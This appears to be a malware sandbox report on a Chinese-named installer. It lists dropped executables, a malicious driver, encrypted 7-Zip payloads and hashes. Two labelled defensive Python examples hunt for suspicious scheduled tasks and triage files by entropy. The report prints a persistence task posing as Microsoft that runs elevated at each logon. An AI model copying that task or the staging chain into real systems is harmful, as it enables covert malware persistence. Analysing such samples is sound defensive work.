                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          • Antivirus: Virustotal, Detection: 6%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3443983145211007
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnyL6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnHwhldOVQOj6dKbKsz7
                          MD5:1E67E91688292692932CD9096EDEA2BD
                          SHA1:AA8859477C235F2F194FC7C4D75EF4C082A6864B
                          SHA-256:ED20E6ED002708041CC98B046F976B2BE43685B258AE6461F291CF73F7128924
                          SHA-512:7C6DE3E403542FE6D33C75F286212A114C7112B8401EAC8323EDBE856CADE905CE11E0B9C4083AE01A711E6B1EC12329CBF43AB0B585BCB56FE8A0F151B47B3E
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAva
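The task XML above names a task at the root of the library (\turminoob) with Author "Microsoft Corporation", a LogonTrigger, RunLevel HighestAvailable, Parallel instances and AllowHardTerminate false. The following Python is an added example for hunting that pattern in exported task definitions; it is not part of the sandbox report. The sample XML is rebuilt from the truncated preview above; its closing elements and the missing Actions block are assumptions (the preview is cut off before them), and the benign comparison task is entirely hypothetical.

```python
"""Hunt for scheduled-task definitions shaped like the dropped task above.

Added example, not from the sandbox report. SAMPLE_TASK is reconstructed from
the truncated preview (closing tags assumed, no Actions block); BENIGN_TASK is
a constructed, hypothetical built-in-style task used as a negative control.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Dict, List, Optional

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


@dataclass
class TaskFacts:
    uri: Optional[str]
    author: Optional[str]
    triggers: List[str]
    run_level: Optional[str]
    settings: Dict[str, str]
    command: Optional[str]
    findings: List[str] = field(default_factory=list)


def _text(root: ET.Element, path: str) -> Optional[str]:
    node = root.find(path, NS)
    return node.text.strip() if node is not None and node.text else None


def parse_task(xml_text: str) -> TaskFacts:
    """Extract the fields a hunter cares about from a Task Scheduler XML document."""
    root = ET.fromstring(xml_text)
    triggers = [t.tag.split("}")[-1] for t in root.findall("t:Triggers/*", NS)]
    settings = {s.tag.split("}")[-1]: (s.text or "").strip()
                for s in root.findall("t:Settings/*", NS)}
    return TaskFacts(
        uri=_text(root, "t:RegistrationInfo/t:URI"),
        author=_text(root, "t:RegistrationInfo/t:Author"),
        triggers=triggers,
        run_level=_text(root, "t:Principals/t:Principal/t:RunLevel"),
        settings=settings,
        command=_text(root, "t:Actions/t:Exec/t:Command"),   # None when no Actions block is present
    )


def assess(task: TaskFacts) -> List[str]:
    """Return human-readable findings; an empty list means nothing matched the pattern."""
    findings: List[str] = []
    uri = (task.uri or "").lower()
    if task.author and "microsoft" in task.author.lower() and not uri.startswith("\\microsoft\\"):
        findings.append("claims Microsoft authorship but lives outside \\Microsoft\\")
    if "LogonTrigger" in task.triggers and task.run_level == "HighestAvailable":
        findings.append("elevated at every logon")
    if task.settings.get("MultipleInstancesPolicy") == "Parallel":
        findings.append("parallel instances allowed")
    if task.settings.get("AllowHardTerminate") == "false":
        findings.append("cannot be hard-terminated")
    if (task.settings.get("StopIfGoingOnBatteries") == "false"
            and task.settings.get("DisallowStartIfOnBatteries") == "false"):
        findings.append("ignores battery state")
    if task.command and not task.command.lower().startswith(("c:\\windows\\", "%systemroot%")):
        findings.append("runs a non-system binary: " + task.command)
    return findings


# Reconstructed from the report preview; everything after StartWhenAvailable is assumed.
SAMPLE_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2005-10-11T13:21:17-08:00</Date>
    <Author>Microsoft Corporation</Author>
    <Version>1.0.0</Version>
    <Description>Microsoft</Description>
    <URI>\turminoob</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled><UserId>user</UserId></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="System"><UserId>user</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
</Task>"""

# Constructed, hypothetical negative control: a task path and settings typical of built-in tasks.
BENIGN_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author><URI>\Microsoft\Windows\Example\Maintenance</URI></RegistrationInfo>
  <Triggers><TimeTrigger><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Principals><Principal id="LocalService"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
  </Settings>
  <Actions><Exec><Command>%SystemRoot%\system32\example.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_doc in (("dropped task", SAMPLE_TASK), ("benign control", BENIGN_TASK)):
        facts = parse_task(xml_doc)
        print(label, facts.uri, assess(facts))
```

On a live host the same checks can be run over the XML files under C:\Windows\System32\Tasks, which hold exactly this format; the "Microsoft author outside \Microsoft\" heuristic is the cheapest single discriminator, the elevated-logon-trigger combination the one that matters for persistence.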
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:OpenPGP Public Key
                          Category:dropped
                          Size (bytes):3002302
                          Entropy (8bit):7.9999367110713795
                          Encrypted:true
                          SSDEEP:49152:fabTxPp50+YBXeTFfQm4v2/gx/4Qkf6e6fKZXN0AkdcXjMjgPXbqmztLN+DWm+ar:fMPp5FYeTFQvZ47wQNPkSTMUPpztL8Dx
                          MD5:8862E3A18FBF883677A39AA59DE0EAAD
                          SHA1:FAE1A1A5E1B34DFF73AD1C4B680C76EE5EDD52A0
                          SHA-256:229618C87597E665556EA6C0F03F70FC56C94E09D031B2EE821B91EDD6576601
                          SHA-512:1E66A5CF02A694B6D014E7A9F849A857CF97C97BC95F834BCEE8138CD4D2AF9A6C341575B3DF494EDBE600A883E6D7A9882D455E17A6DC942D19D09B5BBCF3B9
                          Malicious:false
                          Preview:.qoM....</P.S.H..}.+..D.(..........u....t..?d.S..H.} _......X.2..l.i..k....Xf/H....0?Ar.........4Saj....,..p.......ti.[.:z.{..Nh...=.J?.).K.R..eg..+.R..k.N..f.......2..tH.....|z.:.C.9.y...G..m...vyV].".>0o..CL.7...^.k\.S..........C...-.f.."...{..F5...>.d..@..;..Y........[...*........Y...T....u.?.i.h........S.:t]r{...mg..D.--...].h.vh.W...<TY-E..0..W'6.?.I..HS?...../...g.d.U$......t...;..yDk...I...0...bOx........[.]@....7.d.....H.......f.z1wq..n.Bb...?.Q..:.l.P..:..e...A......5....y..k.uQz.j.V!D.A?..BIH.'...8.l.bw...W......]....sh$Jq....-..........I.E.....|..3`"D.....^..J:4..8.......?.O...jC.xb...,.w>~.,....f.......G.....f|+.Y..0.%...7.....k..A.^_...]..<..}..8..*...Jb...SU...%g>.;.k`............6...kn.\........6M..T..l.!......O..vXR...........cW.....S......U$P[..-.?./..b.=...].7....bri%.8.....$..^...j.O:.I..~...+....>..|.Q|u.m..A.34.l.....\k..S.~}$.3nP...{..._.....kH.W.j..=....U>..\.L[5.t.U...k..Rce.+........)Z*A.AV..=[&......].../u.C$..)....M}$
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulFgtj:NllUa
                          MD5:E986DDCA20E18C878305AA21342325F6
                          SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
                          SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
                          SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
                          Malicious:false
                          Preview:@...e................................................@..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564866469498
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:F71908CEAB1076D5D4250CBFCB02E6B2
                          SHA1:2605DDF88D6191E54CE4935F5F652AD2EB3D90BF
                          SHA-256:41942D878571CFFA23A299A9CEC78B002C6B0B03C640A51C50049FA2A8C7698C
                          SHA-512:FE85D2393D6BC4D92FCAB43667CD16C4B69F2E757D6952D647119B1B15A113FBA1E117CFAD64B7851EB24400AD3DE4FD2A5BAA42271C13054EA9CC90E3DA825A
                          Malicious:true
                          Antivirus:
                          • Antivirus: Virustotal, Detection: 1%, Browse
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564866469498
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:F71908CEAB1076D5D4250CBFCB02E6B2
                          SHA1:2605DDF88D6191E54CE4935F5F652AD2EB3D90BF
                          SHA-256:41942D878571CFFA23A299A9CEC78B002C6B0B03C640A51C50049FA2A8C7698C
                          SHA-512:FE85D2393D6BC4D92FCAB43667CD16C4B69F2E757D6952D647119B1B15A113FBA1E117CFAD64B7851EB24400AD3DE4FD2A5BAA42271C13054EA9CC90E3DA825A
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                          Process:C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
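The dropped-file entries above show the staging chain: .dat files that are really 7-Zip archives (version 0.4, entropy near 8.0, method 7zAES per the 7zr log), unpacked by a bundled 7zr.exe; the log's 63640-byte output matches the size of the PE32+ native driver listed as dropped by 7zr.exe. The following Python is an added triage example, not part of the sandbox report: it computes the same 8-bit entropy metric, identifies content by magic bytes regardless of extension, and parses the fixed 7z signature header including its CRC. The 7.9 entropy threshold is an assumption, and all sample inputs are constructed in code (the 7z sample reuses the log's Physical Size and Headers Size but carries no real archive body).

```python
"""Triage helpers for dropped files: 8-bit Shannon entropy, content type by
magic bytes, and a parser for the 32-byte 7-Zip signature header.

Added example, not from the sandbox report. HIGH_ENTROPY is an assumed
threshold; build_7z_sample() and build_pe_sample() construct synthetic inputs.
"""
import math
import struct
import zlib
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Optional, Set

SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"
HIGH_ENTROPY = 7.9   # assumption: packed or encrypted payloads sit close to the 8.0 ceiling
# Content kinds an extension may legitimately carry; anything else is a mismatch.
EXPECTED_KINDS: Dict[str, Set[str]] = {
    "7z": {"7z"}, "exe": {"pe32", "pe32+"}, "dll": {"pe32", "pe32+"}, "sys": {"pe32", "pe32+"},
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, on the same scale as the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def identify(data: bytes) -> str:
    """Classify by magic bytes: 'pe32', 'pe32+', 'mz-stub', '7z' or 'data'."""
    if data.startswith(b"MZ") and len(data) >= 0x40:
        pe_off = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe_off:pe_off + 4] == b"PE\0\0" and len(data) >= pe_off + 26:
            opt_magic = struct.unpack_from("<H", data, pe_off + 24)[0]   # optional header magic
            return "pe32+" if opt_magic == 0x20B else "pe32"
        return "mz-stub"
    if data.startswith(SEVEN_ZIP_MAGIC):
        return "7z"
    return "data"


@dataclass
class SevenZipHeader:
    major: int
    minor: int
    next_header_offset: int
    next_header_size: int
    start_crc_ok: bool

    def physical_size(self) -> int:
        # Signature header (32) + packed streams + encoded end header.
        return 32 + self.next_header_offset + self.next_header_size


def parse_7z_signature_header(data: bytes) -> Optional[SevenZipHeader]:
    """Layout: 6-byte magic, version major/minor, StartHeaderCRC (u32), then the
    20-byte start header: NextHeaderOffset (u64), NextHeaderSize (u64), NextHeaderCRC (u32).
    StartHeaderCRC is CRC32 over those 20 bytes, which lets us validate the header."""
    if len(data) < 32 or not data.startswith(SEVEN_ZIP_MAGIC):
        return None
    major, minor, start_crc = struct.unpack_from("<BBI", data, 6)
    next_off, next_size, _next_crc = struct.unpack_from("<QQI", data, 12)
    return SevenZipHeader(major, minor, next_off, next_size, zlib.crc32(data[12:32]) == start_crc)


def triage(name: str, data: bytes) -> dict:
    """One record per file: real kind, entropy, extension mismatch, 7z header if any."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    kind = identify(data)
    ent = shannon_entropy(data)
    allowed = EXPECTED_KINDS.get(ext)
    mismatch = (kind != "data") if allowed is None else (kind not in allowed)
    return {
        "name": name, "kind": kind, "entropy": round(ent, 3),
        "high_entropy": ent >= HIGH_ENTROPY, "extension_mismatch": mismatch,
        "seven_zip": parse_7z_signature_header(data) if kind == "7z" else None,
    }


def build_7z_sample(next_header_offset: int = 31890 - 32 - 354, next_header_size: int = 354) -> bytes:
    """Constructed 7z signature header with uniform filler in place of the encrypted body.
    Defaults reproduce the 7zr log's numbers: Physical Size 31890, Headers Size 354."""
    start = struct.pack("<QQI", next_header_offset, next_header_size, 0)
    head = SEVEN_ZIP_MAGIC + bytes([0, 4]) + struct.pack("<I", zlib.crc32(start)) + start
    return head + bytes(range(256)) * 4


def build_pe_sample(pe32plus: bool) -> bytes:
    """Constructed minimal MZ stub + PE signature + COFF header + optional-header magic."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    machine = 0x8664 if pe32plus else 0x14C
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xF0, 0x22)
    return bytes(dos) + coff + struct.pack("<H", 0x20B if pe32plus else 0x10B)


if __name__ == "__main__":
    for name, blob in (("locale3.dat", build_7z_sample()), ("driver.sys", build_pe_sample(True)),
                       ("note.txt", b"# PowerShell test file to determine AppLocker lockdown mode")):
        print(triage(name, blob))
```

The extension check is what the report's "content does not match file extension" signature reduces to; the CRC-validated 7z header tells you whether a high-entropy blob is a deliberately packed archive rather than random or truncated data, and physical_size() lets you confirm the file was dropped whole before spending time on it.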
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.967601185321986
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          File size:9'897'435 bytes
                          MD5:1892cf920ffe70868b967804d9222b14
                          SHA1:2b2a0a6bbd472bf5aee0fb476d4ddd07f0c234dd
                          SHA256:459794c80f6ede491eefd8c6eabf5abe8cbd29a4d224e35072b38af2610f07d0
                          SHA512:ebccfdd092539d0cbca3859111070b502eef0452bcd9cbb6805031af0a1a868480d6d4a54a5a0af86a4622a606447fa1be7b4220241c3a4ab370a1af65f60e5f
                          SSDEEP:196608:lHDsQ/dcSd7VHeeAXOZYEBlg5aiixZ4cENKegvJ4158YPVuyN3gJHu:ljsQ/dcSJVOXLEBlg0vyNyvm1OFyGJO
                          TLSH:C9A62322F2CBD43DE41D0B3719B3A65494FB6A206423AE578AECB4ACCF351601D3E657
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                          Icon Hash:0c0c2d33ceec80aa
                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
